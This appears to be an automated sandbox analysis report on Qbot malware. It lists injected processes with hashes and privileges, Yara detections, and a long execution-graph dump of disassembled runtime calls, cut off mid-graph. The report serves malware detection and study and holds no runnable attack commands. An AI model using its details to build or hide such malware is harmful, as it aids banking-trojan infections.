          MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000014.00000002.400269525.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000014.00000002.400269525.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000014.00000002.400269525.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000014.00000000.386871374.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000014.00000000.386871374.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000014.00000000.386871374.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

          General

          Target ID:22
          Start time:18:11:54
          Start date:12/09/2022
          Path:C:\Windows\SysWOW64\explorer.exe
          Wow64 process (32bit):true
          Commandline:C:\Windows\SysWOW64\explorer.exe
          Imagebase:0x20000
          File size:3611360 bytes
          MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000016.00000002.644257904.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000016.00000002.644257904.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000016.00000002.644257904.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000016.00000000.395725211.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000016.00000000.395725211.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000016.00000000.395725211.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

          General

          Target ID:31
          Start time:18:12:49
          Start date:12/09/2022
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff745070000
          File size:625664 bytes
          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
          Has elevated privileges:true
          Has administrator privileges:false
          Programmed in:C, C++ or other language

          Disassembly

          Reset < >

            Execution Graph

            Execution Coverage:3.5%
            Dynamic/Decrypted Code Coverage:0%
            Signature Coverage:6.9%
            Total number of Nodes:1007
            Total number of Limit Nodes:28
            execution_graph 7590 6d5080d0 7591 6d5080db 7590->7591 7592 6d50810e dllmain_crt_process_detach 7590->7592 7594 6d508100 dllmain_crt_process_attach 7591->7594 7595 6d5080e0 7591->7595 7593 6d5080ea 7592->7593 7594->7593 7596 6d5080e5 7595->7596 7597 6d5080f6 7595->7597 7596->7593 7600 6d5084cc 7596->7600 7605 6d5084ad 7597->7605 7613 6d50b396 7600->7613 7910 6d50957f 7605->7910 7608 6d5084b6 7608->7593 7611 6d5084c9 7611->7593 7612 6d50958a 27 API calls 7612->7608 7619 6d50c828 7613->7619 7616 6d50958a 7875 6d50975b 7616->7875 7620 6d50c832 7619->7620 7621 6d5084d1 7619->7621 7627 6d50cbf4 7620->7627 7621->7616 7647 6d50c9bd 7627->7647 7629 6d50cc1b 7630 6d50cc33 TlsGetValue 7629->7630 7631 6d50cc27 7629->7631 7630->7631 7653 6d508b95 7631->7653 7633 6d50c839 7633->7621 7634 6d50cc4a 7633->7634 7635 6d50c9bd _abort 5 API calls 7634->7635 7636 6d50cc71 7635->7636 7637 6d50cc8c TlsSetValue 7636->7637 7638 6d50cc80 7636->7638 7637->7638 7639 6d508b95 _ValidateLocalCookies 5 API calls 7638->7639 7640 6d50c84c 7639->7640 7641 6d50c713 7640->7641 7642 6d50c72e 7641->7642 7643 6d50c71e 7641->7643 7642->7621 7668 6d50c734 7643->7668 7648 6d50c9e9 7647->7648 7649 6d50c9ed __crt_fast_encode_pointer 7647->7649 7648->7649 7652 6d50ca0d 7648->7652 7660 6d50ca59 7648->7660 7649->7629 7651 6d50ca19 GetProcAddress 7651->7649 7652->7649 7652->7651 7654 6d508ba0 IsProcessorFeaturePresent 7653->7654 7655 6d508b9e 7653->7655 7657 6d508be2 7654->7657 7655->7633 7667 6d508ba6 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 7657->7667 7659 6d508cc5 7659->7633 7661 6d50ca7a LoadLibraryExW 7660->7661 7662 6d50ca6f 7660->7662 7663 6d50ca97 GetLastError 7661->7663 7666 6d50caaf 7661->7666 7662->7648 7665 6d50caa2 LoadLibraryExW 7663->7665 7663->7666 7664 6d50cac6 FreeLibrary 7664->7662 7665->7666 7666->7662 7666->7664 7667->7659 7669 6d50c74d 7668->7669 7670 6d50c747 7668->7670 7672 6d50b3fe __freea 20 API calls 7669->7672 7671 6d50b3fe __freea 20 API calls 7670->7671 7671->7669 7673 6d50c759 7672->7673 7674 6d50b3fe __freea 20 API calls 7673->7674 7675 6d50c764 7674->7675 7676 6d50b3fe __freea 20 API calls 7675->7676 7677 6d50c76f 7676->7677 7678 6d50b3fe __freea 20 API calls 7677->7678 7679 6d50c77a 7678->7679 7680 6d50b3fe __freea 20 API calls 7679->7680 7681 6d50c785 7680->7681 7682 6d50b3fe __freea 20 API calls 7681->7682 7683 6d50c790 7682->7683 7684 6d50b3fe __freea 20 API calls 7683->7684 7685 6d50c79b 7684->7685 7686 6d50b3fe __freea 20 API calls 7685->7686 7687 6d50c7a6 7686->7687 7688 6d50b3fe __freea 20 API calls 7687->7688 7689 6d50c7b4 7688->7689 7700 6d50c5fa 7689->7700 7694 6d50b3fe 7695 6d50b409 HeapFree 7694->7695 7699 6d50b432 __dosmaperr 7694->7699 7696 6d50b41e 7695->7696 7695->7699 7810 6d50bf62 7696->7810 7699->7642 7706 6d50c506 7700->7706 7702 6d50c61e 7703 6d50c64a 7702->7703 7719 6d50c567 7703->7719 7705 6d50c66e 7705->7694 7707 6d50c512 ___scrt_is_nonwritable_in_current_image 7706->7707 7714 6d50c2f6 EnterCriticalSection 7707->7714 7709 6d50c546 7715 6d50c55b 7709->7715 7711 6d50c51c 7711->7709 7713 6d50b3fe __freea 20 API calls 7711->7713 7712 6d50c553 ___scrt_is_nonwritable_in_current_image 7712->7702 7713->7709 7714->7711 7718 6d50c33e LeaveCriticalSection 7715->7718 7717 6d50c565 7717->7712 7718->7717 7720 6d50c573 ___scrt_is_nonwritable_in_current_image 7719->7720 7727 6d50c2f6 EnterCriticalSection 7720->7727 7722 6d50c57d 7728 6d50c7dd 7722->7728 7724 6d50c590 7732 6d50c5a6 7724->7732 7726 6d50c59e ___scrt_is_nonwritable_in_current_image 7726->7705 7727->7722 7729 6d50c813 __fassign 7728->7729 7730 6d50c7ec __fassign 7728->7730 7729->7724 7730->7729 7735 6d50f990 7730->7735 7809 6d50c33e LeaveCriticalSection 7732->7809 7734 6d50c5b0 7734->7726 7736 6d50fa10 7735->7736 7740 6d50f9a6 7735->7740 7738 6d50b3fe __freea 20 API calls 7736->7738 7762 6d50fa5e 7736->7762 7739 6d50fa32 7738->7739 7742 6d50b3fe __freea 20 API calls 7739->7742 7740->7736 7741 6d50f9d9 7740->7741 7744 6d50b3fe __freea 20 API calls 7740->7744 7743 6d50f9fb 7741->7743 7750 6d50b3fe __freea 20 API calls 7741->7750 7745 6d50fa45 7742->7745 7746 6d50b3fe __freea 20 API calls 7743->7746 7748 6d50f9ce 7744->7748 7749 6d50b3fe __freea 20 API calls 7745->7749 7751 6d50fa05 7746->7751 7747 6d50facc 7752 6d50b3fe __freea 20 API calls 7747->7752 7763 6d510d87 7748->7763 7754 6d50fa53 7749->7754 7755 6d50f9f0 7750->7755 7756 6d50b3fe __freea 20 API calls 7751->7756 7757 6d50fad2 7752->7757 7759 6d50b3fe __freea 20 API calls 7754->7759 7791 6d510e85 7755->7791 7756->7736 7757->7729 7758 6d50fa6c 7758->7747 7761 6d50b3fe 20 API calls __freea 7758->7761 7759->7762 7761->7758 7803 6d50fb03 7762->7803 7764 6d510e81 7763->7764 7765 6d510d98 7763->7765 7764->7741 7766 6d510da9 7765->7766 7767 6d50b3fe __freea 20 API calls 7765->7767 7768 6d510dbb 7766->7768 7769 6d50b3fe __freea 20 API calls 7766->7769 7767->7766 7770 6d510dcd 7768->7770 7771 6d50b3fe __freea 20 API calls 7768->7771 7769->7768 7772 6d510ddf 7770->7772 7773 6d50b3fe __freea 20 API calls 7770->7773 7771->7770 7774 6d510df1 7772->7774 7775 6d50b3fe __freea 20 API calls 7772->7775 7773->7772 7776 6d510e03 7774->7776 7777 6d50b3fe __freea 20 API calls 7774->7777 7775->7774 7778 6d510e15 7776->7778 7779 6d50b3fe __freea 20 API calls 7776->7779 7777->7776 7780 6d510e27 7778->7780 7781 6d50b3fe __freea 20 API calls 7778->7781 7779->7778 7782 6d510e39 7780->7782 7783 6d50b3fe __freea 20 API calls 7780->7783 7781->7780 7784 6d510e4b 7782->7784 7785 6d50b3fe __freea 20 API calls 7782->7785 7783->7782 7786 6d510e5d 7784->7786 7787 6d50b3fe __freea 20 API calls 7784->7787 7785->7784 7788 6d510e6f 7786->7788 7789 6d50b3fe __freea 20 API calls 7786->7789 7787->7786 7788->7764 7790 6d50b3fe __freea 20 API calls 7788->7790 7789->7788 7790->7764 7792 6d510e92 7791->7792 7793 6d510eea 7791->7793 7794 6d510ea2 7792->7794 7795 6d50b3fe __freea 20 API calls 7792->7795 7793->7743 7796 6d510eb4 7794->7796 7797 6d50b3fe __freea 20 API calls 7794->7797 7795->7794 7798 6d510ec6 7796->7798 7799 6d50b3fe __freea 20 API calls 7796->7799 7797->7796 7800 6d510ed8 7798->7800 7801 6d50b3fe __freea 20 API calls 7798->7801 7799->7798 7800->7793 7802 6d50b3fe __freea 20 API calls 7800->7802 7801->7800 7802->7793 7804 6d50fb2e 7803->7804 7805 6d50fb10 7803->7805 7804->7758 7805->7804 7806 6d510f2a __fassign 20 API calls 7805->7806 7807 6d50fb28 7806->7807 7808 6d50b3fe __freea 20 API calls 7807->7808 7808->7804 7809->7734 7813 6d50c8d8 GetLastError 7810->7813 7814 6d50c8f1 7813->7814 7817 6d50c8f7 7813->7817 7815 6d50cbf4 _abort 11 API calls 7814->7815 7815->7817 7819 6d50c94e SetLastError 7817->7819 7832 6d50b523 7817->7832 7818 6d50c909 7820 6d50c911 7818->7820 7821 6d50cc4a _abort 11 API calls 7818->7821 7822 6d50b424 GetLastError 7819->7822 7824 6d50b3fe __freea 17 API calls 7820->7824 7823 6d50c926 7821->7823 7822->7699 7823->7820 7825 6d50c92d 7823->7825 7826 6d50c917 7824->7826 7839 6d50c69a 7825->7839 7827 6d50c945 SetLastError 7826->7827 7827->7822 7830 6d50b3fe __freea 17 API calls 7831 6d50c93e 7830->7831 7831->7819 7831->7827 7838 6d50b530 _abort 7832->7838 7833 6d50b570 7836 6d50bf62 __dosmaperr 19 API calls 7833->7836 7834 6d50b55b RtlAllocateHeap 7835 6d50b56e 7834->7835 7834->7838 7835->7818 7836->7835 7838->7833 7838->7834 7844 6d50e440 7838->7844 7855 6d50c672 7839->7855 7849 6d50e484 7844->7849 7846 6d50e456 7847 6d508b95 _ValidateLocalCookies 5 API calls 7846->7847 7848 6d50e480 7847->7848 7848->7838 7850 6d50e490 ___scrt_is_nonwritable_in_current_image 7849->7850 7851 6d50c2f6 _abort EnterCriticalSection 7850->7851 7852 6d50e49b 7851->7852 7853 6d50e4cd _abort LeaveCriticalSection 7852->7853 7854 6d50e4c2 ___scrt_is_nonwritable_in_current_image 7853->7854 7854->7846 7861 6d50c5b2 7855->7861 7857 6d50c696 7858 6d50c622 7857->7858 7867 6d50c4b6 7858->7867 7860 6d50c646 7860->7830 7862 6d50c5be ___scrt_is_nonwritable_in_current_image 7861->7862 7863 6d50c2f6 _abort EnterCriticalSection 7862->7863 7864 6d50c5c8 7863->7864 7865 6d50c5ee _abort LeaveCriticalSection 7864->7865 7866 6d50c5e6 ___scrt_is_nonwritable_in_current_image 7865->7866 7866->7857 7868 6d50c4c2 ___scrt_is_nonwritable_in_current_image 7867->7868 7869 6d50c2f6 _abort EnterCriticalSection 7868->7869 7870 6d50c4cc 7869->7870 7871 6d50c7dd _abort 20 API calls 7870->7871 7872 6d50c4e4 7871->7872 7873 6d50c4fa _abort LeaveCriticalSection 7872->7873 7874 6d50c4f2 ___scrt_is_nonwritable_in_current_image 7873->7874 7874->7860 7876 6d509768 7875->7876 7882 6d5084d6 7875->7882 7877 6d509776 7876->7877 7883 6d509a8e 7876->7883 7888 6d509ac8 7877->7888 7880 6d509786 7893 6d50973f 7880->7893 7882->7593 7897 6d5098f9 7883->7897 7885 6d509aa8 7886 6d509abf TlsGetValue 7885->7886 7887 6d509ab4 7885->7887 7886->7887 7887->7877 7889 6d5098f9 try_get_function 5 API calls 7888->7889 7890 6d509ae2 7889->7890 7891 6d509afc TlsSetValue 7890->7891 7892 6d509af1 7890->7892 7891->7892 7892->7880 7894 6d509756 7893->7894 7895 6d509749 7893->7895 7894->7882 7895->7894 7896 6d50b3fe __freea 20 API calls 7895->7896 7896->7894 7900 6d509929 7897->7900 7902 6d50992d __crt_fast_encode_pointer 7897->7902 7898 6d50994d 7901 6d509959 GetProcAddress 7898->7901 7898->7902 7900->7898 7900->7902 7903 6d509999 7900->7903 7901->7902 7902->7885 7904 6d5099c1 LoadLibraryExW 7903->7904 7908 6d5099b6 7903->7908 7905 6d5099dd GetLastError 7904->7905 7909 6d5099f5 7904->7909 7907 6d5099e8 LoadLibraryExW 7905->7907 7905->7909 7906 6d509a0c FreeLibrary 7906->7908 7907->7909 7908->7900 7909->7906 7909->7908 7916 6d509791 7910->7916 7912 6d5084b2 7912->7608 7913 6d50b38b 7912->7913 7914 6d50c8d8 _abort 20 API calls 7913->7914 7915 6d5084be 7914->7915 7915->7611 7915->7612 7917 6d50979a 7916->7917 7918 6d50979d GetLastError 7916->7918 7917->7912 7919 6d509a8e ___vcrt_FlsGetValue 6 API calls 7918->7919 7920 6d5097b2 7919->7920 7921 6d509817 SetLastError 7920->7921 7922 6d509ac8 ___vcrt_FlsSetValue 6 API calls 7920->7922 7931 6d5097d1 7920->7931 7921->7912 7923 6d5097cb 7922->7923 7924 6d50b523 _abort 20 API calls 7923->7924 7923->7931 7925 6d5097df 7924->7925 7926 6d5097f3 7925->7926 7928 6d509ac8 ___vcrt_FlsSetValue 6 API calls 7925->7928 7927 6d509ac8 ___vcrt_FlsSetValue 6 API calls 7926->7927 7929 6d509807 7926->7929 7927->7929 7928->7926 7930 6d50b3fe __freea 20 API calls 7929->7930 7930->7931 7931->7921 8161 6d515750 8162 6d5157b0 8161->8162 8163 6d5157d4 GetProcessHeap 8162->8163 8166 6d5157cd ___scrt_fastfail 8162->8166 8164 6d51583f 8163->8164 8165 6d515868 RtlAllocateHeap 8164->8165 8164->8166 8165->8166 8840 6d5083d8 8841 6d5083e1 8840->8841 8842 6d5083e6 dllmain_dispatch 8840->8842 8844 6d50872b 8841->8844 8845 6d50875b GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 8844->8845 8846 6d50874e 8844->8846 8847 6d508752 8845->8847 8846->8845 8846->8847 8847->8842 8405 6d50aa78 8416 6d50d854 8405->8416 8410 6d50aa95 8412 6d50b3fe __freea 20 API calls 8410->8412 8413 6d50aaca 8412->8413 8414 6d50aaa0 8415 6d50b3fe __freea 20 API calls 8414->8415 8415->8410 8417 6d50d85d 8416->8417 8418 6d50aa8a 8416->8418 8450 6d50d753 8417->8450 8420 6d50dcab GetEnvironmentStringsW 8418->8420 8421 6d50dcc2 8420->8421 8422 6d50dd18 8420->8422 8425 6d50dcc8 WideCharToMultiByte 8421->8425 8423 6d50aa8f 8422->8423 8424 6d50dd1e FreeEnvironmentStringsW 8422->8424 8423->8410 8433 6d50ab24 8423->8433 8424->8423 8425->8422 8426 6d50dce4 8425->8426 8427 6d50b438 __onexit 21 API calls 8426->8427 8428 6d50dcea 8427->8428 8429 6d50dcf1 WideCharToMultiByte 8428->8429 8430 6d50dd07 8428->8430 8429->8430 8431 6d50b3fe __freea 20 API calls 8430->8431 8432 6d50dd15 8431->8432 8432->8422 8434 6d50ab39 8433->8434 8435 6d50b523 _abort 20 API calls 8434->8435 8445 6d50ab60 8435->8445 8436 6d50abc4 8437 6d50b3fe __freea 20 API calls 8436->8437 8438 6d50abde 8437->8438 8438->8414 8439 6d50b523 _abort 20 API calls 8439->8445 8440 6d50abc6 8830 6d50acef 8440->8830 8444 6d50b3fe __freea 20 API calls 8444->8436 8445->8436 8445->8439 8445->8440 8446 6d50abe8 8445->8446 8448 6d50b3fe __freea 20 API calls 8445->8448 8821 6d50b486 8445->8821 8836 6d50beb6 IsProcessorFeaturePresent 8446->8836 8448->8445 8449 6d50abf4 8470 6d50c854 GetLastError 8450->8470 8452 6d50d760 8490 6d50d872 8452->8490 8454 6d50d768 8499 6d50d4e7 8454->8499 8457 6d50d77f 8457->8418 8458 6d50b438 __onexit 21 API calls 8459 6d50d790 8458->8459 8460 6d50d7c2 8459->8460 8506 6d50d914 8459->8506 8462 6d50b3fe __freea 20 API calls 8460->8462 8462->8457 8464 6d50d7bd 8465 6d50bf62 __dosmaperr 20 API calls 8464->8465 8465->8460 8466 6d50d806 8466->8460 8516 6d50d3bd 8466->8516 8467 6d50d7da 8467->8466 8468 6d50b3fe __freea 20 API calls 8467->8468 8468->8466 8471 6d50c870 8470->8471 8472 6d50c86a 8470->8472 8474 6d50b523 _abort 20 API calls 8471->8474 8476 6d50c8bf SetLastError 8471->8476 8473 6d50cbf4 _abort 11 API calls 8472->8473 8473->8471 8475 6d50c882 8474->8475 8477 6d50c88a 8475->8477 8478 6d50cc4a _abort 11 API calls 8475->8478 8476->8452 8479 6d50b3fe __freea 20 API calls 8477->8479 8480 6d50c89f 8478->8480 8481 6d50c890 8479->8481 8480->8477 8482 6d50c8a6 8480->8482 8483 6d50c8cb SetLastError 8481->8483 8484 6d50c69a _abort 20 API calls 8482->8484 8519 6d50b4e0 8483->8519 8486 6d50c8b1 8484->8486 8487 6d50b3fe __freea 20 API calls 8486->8487 8489 6d50c8b8 8487->8489 8489->8476 8489->8483 8491 6d50d87e ___scrt_is_nonwritable_in_current_image 8490->8491 8492 6d50c854 _abort 38 API calls 8491->8492 8497 6d50d888 8492->8497 8494 6d50d90c ___scrt_is_nonwritable_in_current_image 8494->8454 8496 6d50b4e0 _abort 38 API calls 8496->8497 8497->8494 8497->8496 8498 6d50b3fe __freea 20 API calls 8497->8498 8670 6d50c2f6 EnterCriticalSection 8497->8670 8671 6d50d903 8497->8671 8498->8497 8675 6d50b580 8499->8675 8502 6d50d508 GetOEMCP 8504 6d50d531 8502->8504 8503 6d50d51a 8503->8504 8505 6d50d51f GetACP 8503->8505 8504->8457 8504->8458 8505->8504 8507 6d50d4e7 40 API calls 8506->8507 8508 6d50d933 8507->8508 8511 6d50d984 IsValidCodePage 8508->8511 8513 6d50d93a 8508->8513 8515 6d50d9a9 ___scrt_fastfail 8508->8515 8509 6d508b95 _ValidateLocalCookies 5 API calls 8510 6d50d7b5 8509->8510 8510->8464 8510->8467 8512 6d50d996 GetCPInfo 8511->8512 8511->8513 8512->8513 8512->8515 8513->8509 8712 6d50d5bf GetCPInfo 8515->8712 8785 6d50d37a 8516->8785 8518 6d50d3e1 8518->8460 8530 6d50e5c2 8519->8530 8522 6d50b4f0 8524 6d50b4fa IsProcessorFeaturePresent 8522->8524 8529 6d50b518 8522->8529 8525 6d50b505 8524->8525 8560 6d50bcdc 8525->8560 8566 6d50a733 8529->8566 8569 6d50e530 8530->8569 8533 6d50e61d 8534 6d50e629 _abort 8533->8534 8535 6d50c8d8 _abort 20 API calls 8534->8535 8538 6d50e656 _abort 8534->8538 8541 6d50e650 _abort 8534->8541 8535->8541 8536 6d50e6a2 8537 6d50bf62 __dosmaperr 20 API calls 8536->8537 8539 6d50e6a7 8537->8539 8549 6d50e6ce 8538->8549 8583 6d50c2f6 EnterCriticalSection 8538->8583 8542 6d50bea6 _abort 26 API calls 8539->8542 8541->8536 8541->8538 8543 6d50e685 8541->8543 8542->8543 8592 6d513339 8543->8592 8547 6d50e72d 8557 6d50e758 8547->8557 8585 6d50e614 8547->8585 8548 6d50e725 8550 6d50a733 _abort 28 API calls 8548->8550 8549->8547 8549->8548 8549->8557 8584 6d50c33e LeaveCriticalSection 8549->8584 8550->8547 8554 6d50c854 _abort 38 API calls 8558 6d50e7bb 8554->8558 8556 6d50e614 _abort 38 API calls 8556->8557 8588 6d50e7dd 8557->8588 8558->8543 8559 6d50c854 _abort 38 API calls 8558->8559 8559->8543 8561 6d50bcf8 _abort ___scrt_fastfail 8560->8561 8562 6d50bd24 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8561->8562 8563 6d50bdf5 _abort 8562->8563 8564 6d508b95 _ValidateLocalCookies 5 API calls 8563->8564 8565 6d50be13 8564->8565 8565->8529 8596 6d50a50d 8566->8596 8572 6d50e4d6 8569->8572 8571 6d50b4e5 8571->8522 8571->8533 8573 6d50e4e2 ___scrt_is_nonwritable_in_current_image 8572->8573 8578 6d50c2f6 EnterCriticalSection 8573->8578 8575 6d50e4f0 8579 6d50e524 8575->8579 8577 6d50e517 ___scrt_is_nonwritable_in_current_image 8577->8571 8578->8575 8582 6d50c33e LeaveCriticalSection 8579->8582 8581 6d50e52e 8581->8577 8582->8581 8583->8549 8584->8548 8586 6d50c854 _abort 38 API calls 8585->8586 8587 6d50e619 8586->8587 8587->8556 8589 6d50e7e3 8588->8589 8590 6d50e7ac 8588->8590 8595 6d50c33e LeaveCriticalSection 8589->8595 8590->8543 8590->8554 8590->8558 8593 6d508b95 _ValidateLocalCookies 5 API calls 8592->8593 8594 6d513344 8593->8594 8594->8594 8595->8590 8597 6d50a519 _abort 8596->8597 8598 6d50a531 8597->8598 8618 6d50a667 GetModuleHandleW 8597->8618 8627 6d50c2f6 EnterCriticalSection 8598->8627 8605 6d50a620 8609 6d513339 _abort 5 API calls 8605->8609 8606 6d50a5f4 8634 6d50a626 8606->8634 8615 6d50a625 8609->8615 8610 6d50a2c6 _abort 5 API calls 8616 6d50a5c6 8610->8616 8611 6d50a2c6 _abort 5 API calls 8617 6d50a5d7 8611->8617 8612 6d50a539 8614 6d50a5ae 8612->8614 8612->8617 8628 6d50b207 8612->8628 8614->8610 8614->8616 8616->8611 8631 6d50a617 8617->8631 8619 6d50a525 8618->8619 8619->8598 8620 6d50a6ab GetModuleHandleExW 8619->8620 8621 6d50a6d5 GetProcAddress 8620->8621 8622 6d50a6ea 8620->8622 8621->8622 8623 6d50a707 8622->8623 8624 6d50a6fe FreeLibrary 8622->8624 8625 6d508b95 _ValidateLocalCookies 5 API calls 8623->8625 8624->8623 8626 6d50a711 8625->8626 8626->8598 8627->8612 8642 6d50af21 8628->8642 8663 6d50c33e LeaveCriticalSection 8631->8663 8633 6d50a5f0 8633->8605 8633->8606 8664 6d50ce0f 8634->8664 8637 6d50a654 8639 6d50a6ab _abort 8 API calls 8637->8639 8638 6d50a634 GetPEB 8638->8637 8640 6d50a644 GetCurrentProcess TerminateProcess 8638->8640 8641 6d50a65c ExitProcess 8639->8641 8640->8637 8645 6d50aed0 8642->8645 8644 6d50af45 8644->8614 8646 6d50aedc ___scrt_is_nonwritable_in_current_image 8645->8646 8653 6d50c2f6 EnterCriticalSection 8646->8653 8648 6d50aeea 8654 6d50af90 8648->8654 8652 6d50af08 ___scrt_is_nonwritable_in_current_image 8652->8644 8653->8648 8655 6d50afb0 8654->8655 8658 6d50afb8 8654->8658 8656 6d508b95 _ValidateLocalCookies 5 API calls 8655->8656 8657 6d50aef7 8656->8657 8660 6d50af15 8657->8660 8658->8655 8659 6d50b3fe __freea 20 API calls 8658->8659 8659->8655 8661 6d50c33e _abort LeaveCriticalSection 8660->8661 8662 6d50af1f 8661->8662 8662->8652 8663->8633 8665 6d50ce34 8664->8665 8669 6d50ce2a 8664->8669 8666 6d50c9bd _abort 5 API calls 8665->8666 8666->8669 8667 6d508b95 _ValidateLocalCookies 5 API calls 8668 6d50a630 8667->8668 8668->8637 8668->8638 8669->8667 8670->8497 8674 6d50c33e LeaveCriticalSection 8671->8674 8673 6d50d90a 8673->8497 8674->8673 8676 6d50b59d 8675->8676 8677 6d50b593 8675->8677 8676->8677 8678 6d50c854 _abort 38 API calls 8676->8678 8677->8502 8677->8503 8679 6d50b5be 8678->8679 8683 6d50eb6c 8679->8683 8684 6d50b5d7 8683->8684 8685 6d50eb7f 8683->8685 8687 6d50eb99 8684->8687 8685->8684 8691 6d50fbdd 8685->8691 8688 6d50ebc1 8687->8688 8689 6d50ebac 8687->8689 8688->8677 8689->8688 8690 6d50d872 __fassign 38 API calls 8689->8690 8690->8688 8692 6d50fbe9 ___scrt_is_nonwritable_in_current_image 8691->8692 8693 6d50c854 _abort 38 API calls 8692->8693 8694 6d50fbf2 8693->8694 8697 6d50fc40 ___scrt_is_nonwritable_in_current_image 8694->8697 8703 6d50c2f6 EnterCriticalSection 8694->8703 8696 6d50fc10 8704 6d50fc54 8696->8704 8697->8684 8702 6d50b4e0 _abort 38 API calls 8702->8697 8703->8696 8705 6d50fc62 __fassign 8704->8705 8707 6d50fc24 8704->8707 8706 6d50f990 __fassign 20 API calls 8705->8706 8705->8707 8706->8707 8708 6d50fc43 8707->8708 8711 6d50c33e LeaveCriticalSection 8708->8711 8710 6d50fc37 8710->8697 8710->8702 8711->8710 8713 6d50d5f9 8712->8713 8714 6d50d6a3 8712->8714 8722 6d5103c3 8713->8722 8716 6d508b95 _ValidateLocalCookies 5 API calls 8714->8716 8718 6d50d74f 8716->8718 8718->8513 8721 6d51071d 43 API calls 8721->8714 8723 6d50b580 __fassign 38 API calls 8722->8723 8724 6d5103e3 MultiByteToWideChar 8723->8724 8726 6d510421 8724->8726 8733 6d5104b9 8724->8733 8728 6d50b438 __onexit 21 API calls 8726->8728 8732 6d510442 ___scrt_fastfail 8726->8732 8727 6d508b95 _ValidateLocalCookies 5 API calls 8729 6d50d65a 8727->8729 8728->8732 8736 6d51071d 8729->8736 8730 6d5104b3 8741 6d5104e0 8730->8741 8732->8730 8734 6d510487 MultiByteToWideChar 8732->8734 8733->8727 8734->8730 8735 6d5104a3 GetStringTypeW 8734->8735 8735->8730 8737 6d50b580 __fassign 38 API calls 8736->8737 8738 6d510730 8737->8738 8745 6d510500 8738->8745 8742 6d5104ec 8741->8742 8744 6d5104fd 8741->8744 8743 6d50b3fe __freea 20 API calls 8742->8743 8742->8744 8743->8744 8744->8733 8747 6d51051b 8745->8747 8746 6d510541 MultiByteToWideChar 8748 6d5106f5 8746->8748 8749 6d51056b 8746->8749 8747->8746 8750 6d508b95 _ValidateLocalCookies 5 API calls 8748->8750 8752 6d50b438 __onexit 21 API calls 8749->8752 8755 6d51058c 8749->8755 8751 6d50d67b 8750->8751 8751->8721 8752->8755 8753 6d5105d5 MultiByteToWideChar 8754 6d5105ee 8753->8754 8767 6d510641 8753->8767 8772 6d50cd05 8754->8772 8755->8753 8755->8767 8757 6d5104e0 __freea 20 API calls 8757->8748 8759 6d510618 8762 6d50cd05 11 API calls 8759->8762 8759->8767 8760 6d510650 8761 6d50b438 __onexit 21 API calls 8760->8761 8768 6d510671 8760->8768 8761->8768 8762->8767 8763 6d5106e6 8765 6d5104e0 __freea 20 API calls 8763->8765 8764 6d50cd05 11 API calls 8766 6d5106c5 8764->8766 8765->8767 8766->8763 8769 6d5106d4 WideCharToMultiByte 8766->8769 8767->8757 8768->8763 8768->8764 8769->8763 8770 6d510714 8769->8770 8771 6d5104e0 __freea 20 API calls 8770->8771 8771->8767 8773 6d50c9bd _abort 5 API calls 8772->8773 8774 6d50cd2c 8773->8774 8777 6d50cd35 8774->8777 8780 6d50cd8d 8774->8780 8778 6d508b95 _ValidateLocalCookies 5 API calls 8777->8778 8779 6d50cd87 8778->8779 8779->8759 8779->8760 8779->8767 8781 6d50c9bd _abort 5 API calls 8780->8781 8782 6d50cdb4 8781->8782 8783 6d508b95 _ValidateLocalCookies 5 API calls 8782->8783 8784 6d50cd75 LCMapStringW 8783->8784 8784->8777 8786 6d50d386 ___scrt_is_nonwritable_in_current_image 8785->8786 8793 6d50c2f6 EnterCriticalSection 8786->8793 8788 6d50d390 8794 6d50d3e5 8788->8794 8792 6d50d3a9 ___scrt_is_nonwritable_in_current_image 8792->8518 8793->8788 8806 6d50db05 8794->8806 8796 6d50d433 8797 6d50db05 26 API calls 8796->8797 8798 6d50d44f 8797->8798 8799 6d50db05 26 API calls 8798->8799 8800 6d50d46d 8799->8800 8801 6d50b3fe __freea 20 API calls 8800->8801 8802 6d50d39d 8800->8802 8801->8802 8803 6d50d3b1 8802->8803 8820 6d50c33e LeaveCriticalSection 8803->8820 8805 6d50d3bb 8805->8792 8807 6d50db16 8806->8807 8811 6d50db12 8806->8811 8808 